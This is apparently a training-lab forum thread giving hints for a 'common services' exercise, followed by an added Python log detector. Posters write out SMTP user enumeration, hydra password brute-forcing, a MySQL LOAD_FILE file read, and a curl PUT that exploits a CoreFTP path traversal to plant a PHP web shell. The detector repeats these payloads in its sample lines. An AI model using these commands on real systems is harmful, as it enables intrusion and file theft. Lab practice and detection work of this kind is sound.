Attacking Common Services - Easy

If anyone else is getting the error: mysql: command not found:
It seems that mysql isn’t currently installed in the attackbox so you have to do it yourself.
type: sudo apt install mariadb-client to get it going

I agree with everyone that this password should really be a password from the resources list… however, you must enumerate the password using rockyou

smtp-user-enum xxxxxxxxxx 25 -m RCPT -d inlanefreight.htb -U usernames
hydra -l xxxxxx@inlanefreight.htb -P rockyou xxxxxxxxxx smtp -t 40 -s -vvv


Yeah, I didn’t like the first part. I was able to find the username no problem, but what to do with this information was annoying. Should be sticking to the resources in the module if that’s what you have been using this entire module. However, once you get into the database, that is interesting and a good learning experience into webshells. I didn’t bother with FTP.

fr I wasted so much time thinking that the password would be in the resource list. Like what’s the point of the resources anymore.

Hello everyone;

If someone is still stuck in this part and needs some hints about how to get the flag:
1/ Do your enumeration and get the necessary creds,
2/ Try these with the active services on the target machine,
3/ Or, if you tried to use mysql => SELECT LOAD_FILE(CONCAT(@@basedir, 'Path_to_the_flag\flag.txt'));

-----G00d H4Ck1N9------

STOP OVERHEADING
Finding a web server doesn’t mean you need to exploit it. Avoid overcomplicating the process; simple methods often yield better results.

  1. Access MySQL: Connect using the obtained credentials.
  2. Read a File: Execute LOAD_FILE to retrieve the file contents.

If you have problems with hydra, terminate the machine and start a new one.
I wasted a lot of time thinking I was wrong, but the problem was from the machine.

Also if you have the following error for SQL
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Add --skip-ssl at the end of the command; it should look like this:
mysql -u <user> -p<pass> -h <ip> --skip-ssl


If you find credentials, there is another way to get the flag. The Latest FTP Vulnerabilities section mentions the CoreFTP before build 727 vulnerability. It is as easy as the mysql way. File traversal is the key.

curl -k -X PUT -H "Host: 10.10.10.10" --basic -u YYYY:XXXX --data-binary '<?php system($_GET["cmd"]); ?>' --path-as-is https://10.10.10.10/../xampp/htdocs/backd.php

C:/Users/Administrator/Desktop/flag.txt
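As an added defender-side example (not from any poster in this thread), the two file-access patterns discussed above, LOAD_FILE()/@@basedir in MySQL queries and a PUT with '..' traversal against the web server, are what a detection rule over the MySQL general log and the web access log would look for. The log lines below are constructed for the example; the "mysql "/"http " prefixes are an assumption that stands in for whichever source tags your log pipeline uses.

```python
"""Flag DB-side file reads/writes and traversal in HTTP write requests.
Sample log lines are constructed; real general-log/access-log formats differ
only in the fields around the query or request string."""
import re
from urllib.parse import unquote

SQL_PATTERNS = [
    (re.compile(r"\bLOAD_FILE\s*\(", re.I), "file read via LOAD_FILE()"),
    (re.compile(r"\bINTO\s+(OUT|DUMP)FILE\b", re.I), "file write via INTO OUTFILE/DUMPFILE"),
    (re.compile(r"@@(basedir|datadir)\b", re.I), "server path variable used to build a path"),
]
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE"}
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def check_sql(query):
    """Return the reasons a query looks like file access through the DB server.
    Mitigation side: secure_file_priv and not granting FILE to app users."""
    return [reason for pat, reason in SQL_PATTERNS if pat.search(query)]


def check_http(line):
    """Flag write-type requests whose (double-)decoded path contains '..',
    the CoreFTP-style traversal that drops a file outside the intended root."""
    m = REQ_RE.search(line)
    if not m:
        return []
    method, path = m.group("method"), unquote(unquote(m.group("path")))
    if method in WRITE_METHODS and ".." in path.replace("\\", "/"):
        return [f"{method} with '..' traversal: {path}"]
    return []


def scan(lines):
    """Return (line_no, reason) pairs; the source prefix selects the checker."""
    hits = []
    for no, line in enumerate(lines, 1):
        checker = check_sql if line.startswith("mysql ") else check_http
        hits.extend((no, reason) for reason in checker(line))
    return hits


SAMPLE = [  # constructed sample lines
    "mysql 42 Query SELECT LOAD_FILE(CONCAT(@@basedir, 'flag.txt'))",
    "mysql 42 Query SELECT name FROM users WHERE id = 1",
    'http 10.0.0.5 - - "PUT /../xampp/htdocs/backd.php HTTP/1.1" 201',
    'http 10.0.0.5 - - "GET /index.php HTTP/1.1" 200',
]

if __name__ == "__main__":
    for no, reason in scan(SAMPLE):
        print(f"line {no}: {reason}")
```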